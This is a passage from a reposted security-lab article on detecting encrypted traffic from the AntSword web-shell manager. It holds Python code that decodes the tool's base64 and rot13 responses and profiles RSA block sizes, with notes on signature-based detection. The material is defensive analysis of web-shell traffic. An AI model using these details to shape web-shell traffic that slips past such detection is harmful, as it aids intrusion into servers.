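    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in (9, 10, 13))
    return ok / len(data) if data else 0.0


def _best_base64_payload(body: str, max_affix: int = 12) -> str:
    """Try every trim of up to max_affix characters at both ends and keep the base64 slice
    whose decoding is most printable (longest on ties); the affix lengths vary per request."""
    best = (0.0, 0, "")
    for head in range(max_affix + 1):
        for tail in range(max_affix + 1):
            cand = body[head:len(body) - tail]
            if len(cand) < 4 or len(cand) % 4:
                continue
            try:
                raw = base64.b64decode(cand, validate=True)
            except (binascii.Error, ValueError):
                continue
            key = (_printable_ratio(raw), len(raw))
            if key > best[:2]:
                best = key + (raw.decode("latin-1"),)
    return best[2]


def decode_response(body: str, decoder: str) -> str:
    """Recover the command output from an AntSword response for the given decoder."""
    if decoder == "base64":
        return _best_base64_payload(body)
    # default / rot13: plain text between two random hex affixes (fails if the output itself
    # begins or ends with lowercase hex characters; the base64 search above avoids that).
    core = re.fullmatch(r"[0-9a-f]*(.*?)[0-9a-f]*", body, re.S).group(1)
    return codecs.decode(core, "rot13") if decoder == "rot13" else core


if __name__ == "__main__":
    print(rsa_block_profile(RSA_REQUEST))    # {'chunks': 2, 'block_size': 128, 'rsa_encoded': True}
    print(rsa_block_profile(LOGIN_REQUEST))
    for label, body in (("base64", RESP_BASE64), ("rot13", RESP_ROT13), ("default", RESP_DEFAULT)):
        print(label, repr(decode_response(body, label)))
```

A second structural indicator is visible in the captures themselves: the second and third requests begin with the same three chunks byte for byte. Private-key RSA encryption with PKCS#1 v1.5 padding is deterministic, so under one key the same plaintext chunk always yields the same ciphertext, and a block seen once can be matched again as a per-key signature without any decryption. The block-size test alone will also match legitimate applications that post fixed-size signatures, so in production it should be combined with the response-side pattern and the upload-time indicators rather than used on its own.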





Originally published on the WeChat public account 弥天安全实验室 (Mitian Security Lab): 中国蚁剑RSA非对称加密的攻与防

Reposted by CN-SEC中文网 (with thanks to the original author); please keep the article link when reposting: http://cn-sec.com/archives/1145385.html
